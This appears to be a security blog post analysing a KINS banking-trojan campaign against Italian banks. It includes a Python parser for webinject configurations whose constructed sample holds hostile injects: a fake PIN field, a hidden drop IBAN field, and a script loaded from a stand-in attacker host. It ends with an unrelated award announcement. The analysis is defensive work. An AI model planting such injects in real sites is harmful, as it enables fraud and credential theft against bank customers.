Uncovering a C&C server used by the attackers to control the infected victims. Malware analysis performed on the victims' machines reveals that a sample from the KINS family is targeting the customers of specific Italian banks with ATSEngine: it can dynamically inject code into the victim's browser and manages the "drops" (the accounts used to collect the stolen money) in a fully automatic way. The attack campaign is ongoing right now, and we recovered compromised accounts. Besides that, we reveal the "drops" used to collect the money stolen from the customers.
Another compromised hostname, "https://xxx.com", is acting as a drop-zone for data stolen from eight different Italian banks. Analysis of this drop-zone reveals a custom web application built for information stealing: it harvests credit card details from the infected users through a phishing attack.
The attack is still alive and the number of targeted banks is very large; the C&C servers are networked with multiple entry points, which makes them resilient to takedowns. The analysed sample contains more than 1450 bank hostnames.
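The target list and the injected content described above live in the bot's webinject configuration, and enumerating them is the first step of this kind of analysis. The following is an added example, not the author's tooling or the malware's own code: it assumes the classic ZeuS webinject syntax (set_url / data_before / data_inject / data_after / data_end), which KINS, as a ZeuS derivative, is assumed to share. The inject entries are constructed for illustration and do not come from the real sample or from any real bank; the .example hosts stand in for targeted banks and for the external host from which the injected script is loaded.

```python
import re

# Constructed webinject text in ZeuS syntax; not from a real sample.
SAMPLE_WEBINJECTS = """\
set_url https://www.bank-one.example/login* GP
data_before
<input type="password"*>
data_end
data_inject
<input type="text" name="pin" placeholder="Security PIN" />
data_end
data_after
data_end

set_url https://online.bank-two.example/* G
data_before
</head>
data_end
data_inject
<script src="https://drop.example/ats.js"></script>
data_end
data_after
data_end

set_url *bank-one.example/transfer* GP
data_before
<form*
data_end
data_inject
<input type="hidden" name="drop_iban" />
data_end
data_after
data_end
"""

SECTIONS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text):
    """Parse ZeuS-style webinject text into dicts with keys url, flags,
    data_before, data_inject and data_after. Section bodies are kept
    verbatim because the before/after markers are wildcard patterns."""
    entries, current, section = [], None, None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if section is not None:  # inside a data_* block until data_end
            if line == "data_end":
                section = None
            else:
                current[section].append(raw.rstrip())
            continue
        if not line:
            continue
        if line.startswith("set_url"):
            parts = line.split()
            if len(parts) < 2:
                raise ValueError(f"line {lineno}: set_url without a URL pattern")
            current = {
                "url": parts[1],
                # G/P restrict the inject to GET/POST; other letters kept as-is.
                "flags": parts[2] if len(parts) > 2 else "",
                "data_before": [], "data_inject": [], "data_after": [],
            }
            entries.append(current)
        elif line in SECTIONS:
            if current is None:
                raise ValueError(f"line {lineno}: {line} before any set_url")
            section = line
        else:
            raise ValueError(f"line {lineno}: unexpected token {line!r}")
    if section is not None:
        raise ValueError(f"unterminated {section} block at end of input")
    for entry in entries:
        for name in SECTIONS:
            entry[name] = "\n".join(entry[name])
    return entries


def hostname_from_pattern(pattern):
    """Reduce a set_url wildcard pattern (optional scheme, leading '*',
    port, trailing '*') to the lower-cased host it targets."""
    p = re.sub(r"^[a-z][a-z0-9+.-]*://", "", pattern, flags=re.IGNORECASE)
    host = p.lstrip("*").split("/", 1)[0].split(":", 1)[0]
    return host.rstrip("*").lower()


def target_hostnames(entries):
    """Distinct hosts targeted by the inject set, sorted."""
    hosts = {hostname_from_pattern(e["url"]) for e in entries}
    return sorted(h for h in hosts if h)


# Absolute URLs in src/href/action attributes of the injected HTML: this is
# where an ATS script or a drop-zone collecting stolen data shows up.
_URL_ATTR = re.compile(r"""(?:src|href|action)\s*=\s*["']?(https?://[^"'\s>]+)""",
                       re.IGNORECASE)


def external_references(entries):
    """Hosts loaded by absolute URLs inside data_inject bodies."""
    return {hostname_from_pattern(u)
            for e in entries for u in _URL_ATTR.findall(e["data_inject"])}


if __name__ == "__main__":
    parsed = parse_webinjects(SAMPLE_WEBINJECTS)
    print(f"{len(parsed)} inject entries, {len(target_hostnames(parsed))} target hosts")
    for host in target_hostnames(parsed):
        print("  target:", host)
    for host in sorted(external_references(parsed)):
        print("  injected content loads from:", host)
```

Running the parser over a dumped configuration gives the list of targeted hostnames (the "more than 1450" figure above is this count on the real sample) and, separately, the hosts that the injected HTML pulls scripts or posts form data to, which is where drop-zones and the ATS back end can be spotted for blocking or takedown.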
I am pleased to announce that my idea, Cloud Puzzle Lock, won the Reply Innovation Awards 2014.
I would like to thank all voters and supporters.
Special thanks to my team members Davide, Nicola and Alessandra.